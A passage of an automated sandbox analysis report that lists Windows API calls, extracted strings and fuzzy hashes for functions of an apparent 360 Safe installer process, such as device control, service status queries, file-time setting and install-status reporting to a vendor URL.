                                                                                                                                                                                                                        • Part of subcall function 00AFA5B1: __decode_pointer.LIBCMT ref: 00AFA5BC
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__decode_pointer__dosmaperr__getptd__getptd_noexit__initptd
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3358092440-0
                                                                                                                                                                                                                      • Opcode ID: 62770cbdda07c5d1e9be8d2679d370a00c24e36e46b188a6fa79085f05551800
                                                                                                                                                                                                                      • Instruction ID: e8c8aa9b95dcc99196a3a65d8f092692338915991d7f95df75f63c7e8f8185e3
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 62770cbdda07c5d1e9be8d2679d370a00c24e36e46b188a6fa79085f05551800
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 94110E7250120DAFDB21FFE8DD868AF7BE5FF00360B10402AF311A30A1EB7199018BA1
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00AE1DD0
                                                                                                                                                                                                                        • Part of subcall function 00AA0579: _vswprintf_s.LIBCMT ref: 00AA05AB
                                                                                                                                                                                                                      • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,?,00000000,?,?), ref: 00AE1E06
                                                                                                                                                                                                                      • DeviceIoControl.KERNEL32(00000000,002D1080,00000000,00000000,?,0000000C,?,00000000), ref: 00AE1E30
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,?), ref: 00AE1E3B
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,?), ref: 00AE1E43
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CloseHandle$ControlCreateDeviceFile_memset_vswprintf_s
                                                                                                                                                                                                                      • String ID: \\.\%c:
                                                                                                                                                                                                                      • API String ID: 759969516-1260769427
                                                                                                                                                                                                                      • Opcode ID: 53eb9f52bf6972e47794e58289ae10a60850df50dc5552efe7fb49162db48e5a
                                                                                                                                                                                                                      • Instruction ID: 6b3e6aa52a2c61957b352c1769d7f66131aad05ddbcce5231894ee185419c01b
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 53eb9f52bf6972e47794e58289ae10a60850df50dc5552efe7fb49162db48e5a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B611B6B1A41228BBD720EBA69C4DEFB7BACEF19721F104551FA15D3081DA709E44CBB0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __EH_prolog3_catch.LIBCMT ref: 00AE563E
                                                                                                                                                                                                                      • GetDC.USER32(00000000), ref: 00AE564B
                                                                                                                                                                                                                        • Part of subcall function 00AE548F: _memset.LIBCMT ref: 00AE54B5
                                                                                                                                                                                                                        • Part of subcall function 00AE548F: GetVersionExW.KERNEL32(?), ref: 00AE54C8
                                                                                                                                                                                                                      • EnumFontFamiliesW.GDI32(00000000,00000000,00AE559A), ref: 00AE5666
                                                                                                                                                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 00AE56BF
                                                                                                                                                                                                                      • CreateFontW.GDI32(000000F4,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000086,00000000,00000000,00000000,00000020,?), ref: 00AE56DF
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Font$CreateEnumFamiliesH_prolog3_catchReleaseVersion_memset
                                                                                                                                                                                                                      • String ID: Tahoma
                                                                                                                                                                                                                      • API String ID: 3542596840-3580928618
                                                                                                                                                                                                                      • Opcode ID: 0c9e3126da082b82c6f005afdc4a9c7abe7c4bdebb71f1c8838da5b0b1b8b60a
                                                                                                                                                                                                                      • Instruction ID: fa2e80dafa1eb1cc9641a5b3e508922ac527e0ef9f9209f6dfd5a8d56df79595
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0c9e3126da082b82c6f005afdc4a9c7abe7c4bdebb71f1c8838da5b0b1b8b60a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0B11E331500BC07AD230A7B39D09FA73EA8DBCAB14F44C80CF56A861D0DBA89480CB20
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,0000000D,?,6C5E4437,?,6C5E4D1D,00000000,00000000,?,?,6C654DB4,?,?,?,?,?), ref: 6C68C58E
                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,?,6C5E4D1D,00000000,00000000,?,?,6C654DB4,?,?,?,?,?,00000001,?,?), ref: 6C68C595
                                                                                                                                                                                                                        • Part of subcall function 6C68C4A6: IsProcessorFeaturePresent.KERNEL32(0000000C,6C68C57C,?,6C5E4437,?,6C5E4D1D,00000000,00000000,?,?,6C654DB4,?,?,?,?,?), ref: 6C68C4A8
                                                                                                                                                                                                                      • RtlInterlockedPopEntrySList.NTDLL(0085A758), ref: 6C68C5A2
                                                                                                                                                                                                                      • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,6C5E4D1D,00000000,00000000,?,?,6C654DB4,?,?,?,?,?), ref: 6C68C5B7
                                                                                                                                                                                                                      • RtlInterlockedPopEntrySList.NTDLL(00000000), ref: 6C68C5D0
                                                                                                                                                                                                                      • VirtualFree.KERNEL32(00000000,00000000,00008000,?,6C5E4D1D,00000000,00000000,?,?,6C654DB4,?,?,?,?,?,00000001), ref: 6C68C5E4
                                                                                                                                                                                                                      • RtlInterlockedPushEntrySList.NTDLL(00000000), ref: 6C68C5FB
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2578652771.000000006C5D1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578613735.000000006C5D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578764889.000000006C6B5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578811722.000000006C6D9000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6DB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6E0000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6FF000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2579003199.000000006C700000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2579038423.000000006C706000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_6c5d0000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: EntryInterlockedList$AllocHeapVirtual$FeatureFreePresentProcessProcessorPush
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2304957937-0
                                                                                                                                                                                                                      • Opcode ID: a6ec332b9be13f91b36c0d967cc2991af3e01b45deeb1467902093b0e9ce87a4
                                                                                                                                                                                                                      • Instruction ID: 60c0a8623ccf2ad035006ca46f6c3c3658292bb65d7e21d321415fd1bf60f703
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a6ec332b9be13f91b36c0d967cc2991af3e01b45deeb1467902093b0e9ce87a4
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1301C4723472107BEF11663AEC48F8A7BB9AB82B15F154238F502E7680DF60C8508B7D
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00AD8657: _memset.LIBCMT ref: 00AD867B
                                                                                                                                                                                                                        • Part of subcall function 00AD8657: _memset.LIBCMT ref: 00AD868C
                                                                                                                                                                                                                        • Part of subcall function 00AD8657: GetVersionExW.KERNEL32(?,?,?,?,?,?,00000000), ref: 00AD86A1
                                                                                                                                                                                                                        • Part of subcall function 00AD8657: GetVersionExW.KERNEL32(?,?,?,?,?,?,00000000), ref: 00AD86B2
                                                                                                                                                                                                                        • Part of subcall function 00AD8657: GetModuleHandleW.KERNEL32(kernel32.dll,GetNativeSystemInfo,?,?,?,?,?,00000000), ref: 00AD86C2
                                                                                                                                                                                                                        • Part of subcall function 00AD8657: GetProcAddress.KERNEL32(00000000), ref: 00AD86C9
                                                                                                                                                                                                                        • Part of subcall function 00AD8657: GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,00000000), ref: 00AD86D7
                                                                                                                                                                                                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,?,00000000,?,?,?,?,?,00ADEAAD,?,?,00100000,00000000,0000008C), ref: 00ADD391
                                                                                                                                                                                                                      • OpenServiceW.ADVAPI32(00000000,360FsFlt,00000034,?,?,?,?,00ADEAAD,?,?,00100000,00000000,0000008C), ref: 00ADD3A5
                                                                                                                                                                                                                      • QueryServiceStatusEx.ADVAPI32(00000000,00000000,?,00000024,0000008C,?,?,?,?,00ADEAAD,?,?,00100000,00000000,0000008C), ref: 00ADD3BD
                                                                                                                                                                                                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,00ADEAAD,?,?,00100000,00000000,0000008C), ref: 00ADD3D5
                                                                                                                                                                                                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,00ADEAAD,?,?,00100000,00000000,0000008C), ref: 00ADD3D8
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Service$Handle$CloseOpenVersion_memset$AddressInfoManagerModuleNativeProcQueryStatusSystem
                                                                                                                                                                                                                      • String ID: 360FsFlt
                                                                                                                                                                                                                      • API String ID: 470164251-3852983893
                                                                                                                                                                                                                      • Opcode ID: 5392680b1546b953c9681f94386add2f9be4372461248b6d631b202906419056
                                                                                                                                                                                                                      • Instruction ID: 0d5cc98156975c59ea52f06d310183930778da8f231190cf092428e9af865167
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5392680b1546b953c9681f94386add2f9be4372461248b6d631b202906419056
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CDF0A4726002186FE7306BA99CC9DBF76ACDB44798B000026F612FB240DFA0DD46A672
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 6C601C52
                                                                                                                                                                                                                      • GdiplusStartup.GDIPLUS(?,?,00000000,00000018), ref: 6C601C74
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 6C601CBE
                                                                                                                                                                                                                      • GetCurrentDirectoryW.KERNEL32(00000400,00000000), ref: 6C601CCF
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C601D0A
                                                                                                                                                                                                                      • SetWindowsHookExW.USER32(00000003,6C5ED3E5,00000000,00000000), ref: 6C601D19
                                                                                                                                                                                                                        • Part of subcall function 6C5F537A: __EH_prolog3_catch.LIBCMT ref: 6C5F5381
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2578652771.000000006C5D1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578613735.000000006C5D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578764889.000000006C6B5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578811722.000000006C6D9000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6DB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6E0000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6FF000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2579003199.000000006C700000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2579038423.000000006C706000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_6c5d0000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Current$DirectoryGdiplusH_prolog3H_prolog3_catchHookStartupThreadWindows_memset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3120476819-0
                                                                                                                                                                                                                      • Opcode ID: c07486d806bca4af5eafce49ce6153dd9497384cf9ded2cf8ba83910bb066419
                                                                                                                                                                                                                      • Instruction ID: 754d6aeee57ae4fdbf5546b4189e5fcb7dff4419fc362f44ffc39548661628fa
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c07486d806bca4af5eafce49ce6153dd9497384cf9ded2cf8ba83910bb066419
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 903170B1A01209DFDB04DFA4C984AEDB7F8FF49308F50452EE545E7680DB359A09CBA8
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000003,00000080,00000000), ref: 00A917F0
                                                                                                                                                                                                                      • DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 00A91808
                                                                                                                                                                                                                      • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00A91831
                                                                                                                                                                                                                      • SetFileTime.KERNEL32(00000000,?,00000000,?), ref: 00A9183F
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00A91846
                                                                                                                                                                                                                      • SetFileAttributesW.KERNEL32(?,?), ref: 00A91853
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: File$Time$AttributesCloseCreateDateHandleLocal
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 820720069-0
                                                                                                                                                                                                                      • Opcode ID: 0ceb301294b97287c93b310bf1de2701108fe2b282d0c10b76a365f37c0f6842
                                                                                                                                                                                                                      • Instruction ID: 2c08022395642a98481a2989e93a739a104a75a8d8458d2949a8d80475f63d53
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0ceb301294b97287c93b310bf1de2701108fe2b282d0c10b76a365f37c0f6842
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E3115B76A00219BBEB21DFA4DC49FEE7BB8EB04711F044025F921A7190DB70EA529B64
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00AB73F4
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00AB7422
                                                                                                                                                                                                                        • Part of subcall function 00AF3480: _memset.LIBCMT ref: 00AF34C1
                                                                                                                                                                                                                        • Part of subcall function 00AF3480: _memset.LIBCMT ref: 00AF34DE
                                                                                                                                                                                                                        • Part of subcall function 00AF3480: lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,00B5CDA4,00000000), ref: 00AF34ED
                                                                                                                                                                                                                        • Part of subcall function 00AB71E2: _memset.LIBCMT ref: 00AB7216
                                                                                                                                                                                                                        • Part of subcall function 00AB71E2: SHGetValueW.SHLWAPI(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\360safe.exe,Path,?,?,?,?,?,00B5CDA4), ref: 00AB7239
                                                                                                                                                                                                                        • Part of subcall function 00AB71E2: PathCombineW.SHLWAPI(?,?,360safe.exe,?,?,?,00B5CDA4), ref: 00AB7269
                                                                                                                                                                                                                        • Part of subcall function 00AB71E2: PathFileExistsW.SHLWAPI(?,?,?,00B5CDA4), ref: 00AB7273
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • &pid=, xrefs: 00AB74CF
                                                                                                                                                                                                                      • http://s.360.cn/safe/instcomp.htm?soft=%d&status=%d&m=%s&from=%s&vv=10&installed=%d, xrefs: 00AB7473
                                                                                                                                                                                                                      • &ver=, xrefs: 00AB74AF
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _memset$Path$CombineExistsFileH_prolog3Valuelstrlen
                                                                                                                                                                                                                      • String ID: &pid=$&ver=$http://s.360.cn/safe/instcomp.htm?soft=%d&status=%d&m=%s&from=%s&vv=10&installed=%d
                                                                                                                                                                                                                      • API String ID: 3972583164-2772831180
                                                                                                                                                                                                                      • Opcode ID: bf1a137d5ce4db50d3e7c712949310370358197db6319d908b0cdc5434e4cac7
                                                                                                                                                                                                                      • Instruction ID: 93ca0305d68613e536362320e8d99bcdfa8369922db6a43a23dc1bb3a95713eb
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bf1a137d5ce4db50d3e7c712949310370358197db6319d908b0cdc5434e4cac7
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D5317F7190021DAFDB14FBA4DD56AFEB7B8FF18305F008469B615A7192DB706A05CB21
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00A82750: _vswprintf_s.LIBCMT ref: 00A82783
                                                                                                                                                                                                                      • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000,?,?,00000104,00000000), ref: 00AF291E
                                                                                                                                                                                                                      • DeviceIoControl.KERNEL32 ref: 00AF296D
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00AF29BD
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CloseControlCreateDeviceFileHandle_vswprintf_s
                                                                                                                                                                                                                      • String ID: %02X%02X%02X%02X%02X%02X$\\.\%s
                                                                                                                                                                                                                      • API String ID: 2864800763-1525991222
                                                                                                                                                                                                                      • Opcode ID: ac2f2ce8eaf21b3683caa7abc74c2c291c3e3da4ca4453689de8bd43423c42e4
                                                                                                                                                                                                                      • Instruction ID: 7073c22eb3e461d55bdb95373dd3343d5fa7045e79bd3386750ff283904b2c8b
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ac2f2ce8eaf21b3683caa7abc74c2c291c3e3da4ca4453689de8bd43423c42e4
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E121B5B15083546EE334EB65DCD6FFBB6ECAB8C715F40491DB6E483190D6B48A048762
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00AA86BD
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00AA86F8
                                                                                                                                                                                                                      • GetClassNameW.USER32(?,00000000,00000104), ref: 00AA870B
                                                                                                                                                                                                                        • Part of subcall function 00A87FA1: __wcsicoll.LIBCMT ref: 00A87FB9
                                                                                                                                                                                                                      • IsDialogMessageW.USER32(?,?), ref: 00AA8757
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ClassDialogH_prolog3MessageName__wcsicoll_memset
                                                                                                                                                                                                                      • String ID: EDIT
                                                                                                                                                                                                                      • API String ID: 858151411-3080729518
                                                                                                                                                                                                                      • Opcode ID: 0f4f088763ac6173e2f7ae742eb2b55595e785cfa22f534c8f7e707703c21a94
                                                                                                                                                                                                                      • Instruction ID: a737493d762f9b0daac28a0c054d82c24d832f8df67e50e08d0b9e4749a7817c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0f4f088763ac6173e2f7ae742eb2b55595e785cfa22f534c8f7e707703c21a94
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B02190759002089BDB34EF64DD49ABEB7A4EF15710F20892AF96AD72E1DF34A904CB50
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 00A7E084
